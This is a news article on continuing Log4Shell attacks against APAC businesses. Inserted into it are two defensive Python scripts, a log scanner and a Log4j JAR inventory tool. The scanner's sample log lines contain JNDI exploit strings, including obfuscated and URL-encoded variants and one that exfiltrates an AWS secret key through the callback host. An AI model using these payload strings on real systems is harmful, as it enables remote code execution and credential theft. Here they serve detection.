SecurityBrief New Zealand - Technology news for CISOs & cybersecurity decision-makers
APAC businesses still battling U.S. Log4Shell attacks
Wed, 9th Mar 2022

Log4Shell attacks remain a persistent and complex threat to APAC businesses, according to Barracuda. The company has found that the bug is still leaving businesses in Asia-Pacific exposed to attacks that smuggle the exploit string into input the application logs.

Log4Shell (CVE-2021-44228) was first publicly disclosed in December 2021. It is a vulnerability in Log4j, a Java-based logging framework maintained as an Apache project. Log4j is an open source Java package used for activity logging in many popular Java applications.

The New Zealand CERT says, "Log4j has an unauthenticated RCE vulnerability if a user-controlled string is logged. This could allow the attacker full control of the affected server. Reports from online users show that this is being actively exploited in the wild, and that proof-of-concept code has been published."

While not all software written in Java is vulnerable, the affected package is widely used by developers across multiple organisations.

When it was disclosed, the National Vulnerability Database gave the vulnerability the highest possible severity rating (a CVSS base score of 10.0) because of how easily attackers can exploit it.

Since then, Barracuda researchers have been analysing the attacks and payloads they detect and have found that the volume of attacks remains relatively constant and is unlikely to diminish any time soon. The company says the vulnerability allows a remote attacker to take control of an internet-facing device that runs a vulnerable version of Log4j 2 (2.0-beta9 through 2.14.1 were affected by the original bug). Logging is a critical component of most applications and systems because it lets developers and system administrators verify that software is working properly and dig into the details when it is not. That is also why attacker-supplied input, such as a User-Agent header or a login name, so often ends up in a log and within reach of this bug.
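The payload analysis described above, as an added example that is not Barracuda's code and does not come from the article: the trigger the NZ CERT describes is a lookup string such as `${jndi:ldap://host/x}` landing in any field the application logs, and in-the-wild payloads hide it behind nested Log4j lookups (`${lower:j}`, `${::-n}`, `${env:UNSET:-d}`) and URL encoding. The script below de-obfuscates those tricks in web-server log lines and reports the JNDI scheme and target. The log lines and IP addresses are constructed (RFC 5737 documentation ranges), the case and default-value lookups it models are real Log4j 2 syntax, and collapsing an unresolvable lookup to an empty string is a detection-side heuristic chosen here, not Log4j's own behaviour.

```python
"""Normalise Log4j 2 lookup obfuscation in web-server log lines and flag JNDI payloads."""
import re
import urllib.parse
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One innermost ${...} lookup: no further braces inside. Log4j resolves inner lookups first.
LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# What we want to see once the obfuscation is stripped: ${jndi:<scheme>:<target>}
JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):([^}]*)\}", re.IGNORECASE)


def _evaluate(body: str) -> Optional[str]:
    """Resolve one innermost lookup the way attackers rely on Log4j 2 doing it.

    Returns None for a jndi lookup so it is left in place for the final match.
    Modelled: lower/upper case conversion, default values (${env:UNSET:-j}, ${::-j})
    and unresolvable lookups, which are collapsed to "" here (a detection-side
    choice so ${env:X} padding cannot break the match; Log4j itself keeps them)."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return ""


def normalise(raw: str, max_rounds: int = 20) -> str:
    """URL-decode (twice, for double encoding) and resolve nested lookups inner-to-outer."""
    text = urllib.parse.unquote(urllib.parse.unquote(raw))
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            value = _evaluate(m.group(1))
            if value is None:
                return m.group(0)
            changed = True
            return value

        text = LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


@dataclass(frozen=True)
class Finding:
    scheme: str       # ldap, ldaps, rmi, dns, iiop, ...; "unknown" if only the keyword survived
    target: str       # whatever followed the scheme, usually //host:port/path
    normalised: str   # the de-obfuscated line, handy for the incident report


def scan_line(line: str) -> Optional[Finding]:
    norm = normalise(line)
    m = JNDI.search(norm)
    if m:
        return Finding(m.group(1).lower(), m.group(2), norm)
    if "jndi:" in norm.lower():          # keyword survived in a shape the regex missed
        return Finding("unknown", "", norm)
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, Finding]]:
    """Return (1-based line number, Finding) for every line carrying a JNDI lookup."""
    return [(i, f) for i, line in enumerate(lines, 1) if (f := scan_line(line)) is not None]


# Constructed access-log lines using RFC 5737 documentation addresses, not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/Exploit}"',
    '198.51.100.7 - - [10/Dec/2021:03:14:16 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}d${::-i}:${lower:l}${env:NOPE:-d}ap://203.0.113.9:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:03:15:02 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.9 - - [10/Dec/2021:03:16:40 +0000] "GET /login HTTP/1.1" 200 2048 "-" '
    '"${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.203.0.113.9/a}"',
    '203.0.113.20 - - [10/Dec/2021:03:17:01 +0000] "GET /api?tpl=${user.name} HTTP/1.1" 200 80 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for lineno, finding in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: jndi scheme={finding.scheme} target={finding.target}")
```

The fourth sample shows why the normalisation matters for triage as well as detection: the `${env:AWS_SECRET_ACCESS_KEY}` inside the LDAP host is an exfiltration attempt, so a hit on a line like that should be treated as a possible secret leak even if the callback never succeeded. The fifth line carries a harmless `${...}` template string and produces no finding.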

The researchers also report on where the attacks came from. The majority originated from IP addresses in the U.S., and half of those were associated with AWS, Azure and other data centres. Attacks were also sent from Japan, Germany, the Netherlands and Russia.

"These were the IPs that performed scans and attempted intrusions. Actual payloads would have been delivered from other compromised websites or VPS hosts," says Barracuda senior product marketing manager, Applications and Cloud Security, Tushar Richabadas.

"Given the popularity of the software, the exploitability of the vulnerability and the payoff when a compromise happens, we expect to see this attack pattern continue, at least for the short term."

He says the best way to protect against Log4Shell is to upgrade to the latest version of Log4j. Maintaining up-to-date software and libraries helps ensure that known vulnerabilities are patched. Given the growing number of vulnerabilities found in web applications, protecting against attacks is becoming progressively more complex.
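Upgrading only helps if you know every copy of Log4j you run, and the library is frequently buried inside WAR files and fat JARs rather than sitting in a lib directory. As an added example that is not from the article or Barracuda, the following script inventories log4j-core JARs under a directory, descends into nested archives, reads the version from the Maven `pom.properties` that log4j-core ships with, and flags copies older than the fully patched release for their branch (2.3.2 for the Java 6 line, 2.12.4 for Java 7, 2.17.1 for Java 8 and later, which are Apache's releases closing CVE-2021-44228 and its follow-ups; those numbers are facts about Apache's releases, not from the article). It also reports whether `JndiLookup.class` is present, since deleting that class from the JAR was the stop-gap mitigation many teams applied. The sample deployment tree it scans is constructed in a temporary directory with fake JARs.

```python
"""Inventory log4j-core JARs on disk, including JARs nested in WAR/EAR/fat JARs, and flag old ones."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Iterator, List, Tuple

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


@dataclass(frozen=True)
class Log4jHit:
    path: str                  # outer file path, "!" separates nested archives
    version: str
    jndi_lookup_present: bool  # False if JndiLookup.class was stripped as a mitigation
    vulnerable: bool           # older than the fixed release for its branch


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0) so pre-releases sort below every fix."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        return (0, 0, 0)
    return tuple(int(p or 0) for p in m.groups())


def fixed_release(version: Tuple[int, ...]) -> Tuple[int, ...]:
    """Minimum fully patched log4j-core release for the branch the installed version is on."""
    major, minor = version[0], version[1]
    if major != 2:
        return (2, 17, 1)      # 1.x is end-of-life: anything not on 2.x needs replacing
    if minor <= 3:
        return (2, 3, 2)       # Java 6 line
    if minor <= 12:
        return (2, 12, 4)      # Java 7 line
    return (2, 17, 1)          # Java 8+ line


def _scan_archive(data: bytes, label: str) -> Iterator[Log4jHit]:
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if POM in names:
        props = zf.read(POM).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.MULTILINE)
        version = m.group(1).strip() if m else "unknown"
        parsed = parse_version(version)
        yield Log4jHit(label, version, JNDI_CLASS in names, parsed < fixed_release(parsed))
    for name in names:                       # recurse into shaded/fat JARs and WEB-INF/lib
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            yield from _scan_archive(zf.read(name), f"{label}!{name}")


def scan_tree(root: str) -> List[Log4jHit]:
    hits: List[Log4jHit] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, f)
                with open(full, "rb") as fh:
                    hits.extend(_scan_archive(fh.read(), os.path.relpath(full, root)))
    return sorted(hits, key=lambda h: h.path)


def _fake_log4j_core(version: str, with_jndi_class: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core JAR: only the files the scanner looks at."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if with_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
    return buf.getvalue()


def build_sample_tree() -> str:
    """Constructed fixture: an app with three log4j-core copies, one nested inside a WAR."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(_fake_log4j_core("2.14.1"))
    with open(os.path.join(lib, "log4j-core-2.17.1.jar"), "wb") as f:
        f.write(_fake_log4j_core("2.17.1"))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:   # 2.16.0 with JndiLookup.class removed by hand
        zf.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", _fake_log4j_core("2.16.0", with_jndi_class=False))
    with open(os.path.join(root, "app", "service.war"), "wb") as f:
        f.write(war.getvalue())
    return root


if __name__ == "__main__":
    for hit in scan_tree(build_sample_tree()):
        status = "VULNERABLE" if hit.vulnerable else "ok"
        print(f"{status:10} {hit.version:8} jndi_lookup={hit.jndi_lookup_present!s:5} {hit.path}")
```

Point `scan_tree` at a real application root instead of `build_sample_tree()` to use it. The 2.16.0 copy inside the WAR is reported as still needing an upgrade even though its `JndiLookup.class` was removed: that mitigation blocks the JNDI path but later Log4j 2 fixes are not in that release, and a version-based inventory is what lets you confirm the upgrade the article recommends actually reached every copy.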

However, Richabadas says all-in-one solutions are now available, including WAF and WAF-as-a-Service products, also known as Web Application and API Protection (WAAP) services, which can help protect web applications by providing the latest security controls in front of them.